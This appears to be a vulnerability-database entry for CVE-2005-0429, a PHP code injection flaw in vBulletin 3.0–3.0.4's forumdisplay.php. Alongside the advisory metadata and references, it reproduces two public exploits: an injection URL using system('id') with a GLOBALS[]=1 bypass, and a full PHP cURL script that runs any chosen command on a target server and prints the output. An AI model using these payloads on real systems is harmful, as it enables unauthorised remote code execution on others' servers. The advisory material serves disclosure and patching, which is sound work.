CVE-2005-0429
CVSS 5.0
Published: 2005-05-02 00:00:00
Last revised: 2016-10-17 23:11:36

[Original] Direct code injection vulnerability in forumdisplay.php in vBulletin 3.0 through 3.0.4, when showforumusers is enabled, allows remote attackers to inject and execute arbitrary PHP commands via the comma parameter.


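[CNNVD] vBulletin 3.0.x PHP remote arbitrary code execution vulnerability (CNNVD-200505-246)

        The vBulletin forumdisplay.php script has a security flaw that lets a remote attacker execute arbitrary commands with the privileges of the process.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)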

cpe:/a:jelsoft:vbulletin:3.0.4
cpe:/a:jelsoft:vbulletin:3.0.3
cpe:/a:jelsoft:vbulletin:3.0.2
cpe:/a:jelsoft:vbulletin:3.0
cpe:/a:jelsoft:vbulletin:3.0.1

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0429
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0429
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-246
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=110840807415315&w=2
(UNKNOWN)  BUGTRAQ  20050213 vbulletin 3.0.x PHP code execution
http://www.securityfocus.com/bid/12542
(UNKNOWN)  BID  12542

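- Vulnerability information

vBulletin 3.0.x PHP remote arbitrary code execution vulnerability
Medium risk  Input validation
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote
        The vBulletin forumdisplay.php script has a security flaw that lets a remote attacker execute arbitrary commands with the privileges of the process.

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue. The patch is available at:
        http://www.vbulletin.com/

- Vulnerability information (818)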

vBulletin <= 3.0.4 "forumdisplay.php" Code Execution (EDBID:818)
php webapps
2005-02-14 Verified
0 AL3NDALEEB
N/A
Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

Conditions:
----------------
1st condition     : $vboptions['showforumusers'] == True , the admin must set
		    showforumusers ON in vbulletin options.

2nd condition     : $bbuserinfo['userid'] == 0 , you must be a visitor/guest.

3rd condition     : $DB_site->fetch_array($forumusers) == True , when you
		    visit the forums, it must have at least one user shown in the forum.

4th condition     : magic_quotes_gpc must be OFF

SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
		    init.php by secret array GLOBALS[]=1 ;)))

# milw0rm.com [2005-02-14]
		

- Vulnerability information (820)

vBulletin <= 3.0.4 "forumdisplay.php" Code Execution (part 2) (EDBID:820)
php webapps
2005-02-15 Verified
0 AL3NDALEEB
N/A
<?php
/**************************************************************
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions['showforumusers'] == True , the admin must set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo['userid'] == 0 , you must be an visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when you
# visit the forums, it must has at least
# one user show the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
# 
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
# 
**************************************************************/

if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}

if ($argv[3]){
$url = $argv[1];
$forumid = intval($argv[2]);
$command = $argv[3];
}
else {
echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
echo "<forumid> forum id\n";
echo "<command> command to execute on server (ex: 'ls -la')\n";
echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
echo "ex :\n";
echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";

exit;
}

if ($argv[4])
$proxy = $argv[4];



$action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';

$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.'/'.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$res = substr($res, strpos($res, '_START_')+7);
$res = substr($res,0, strpos($res, '_END_'));
echo $res;


?>

// milw0rm.com [2005-02-15]
		

- Vulnerability information

14026
vBulletin forumdisplay.php comma Parameter Arbitrary Command Execution
Remote / Network Access
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-02-13 Unknown
2005-02-13 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete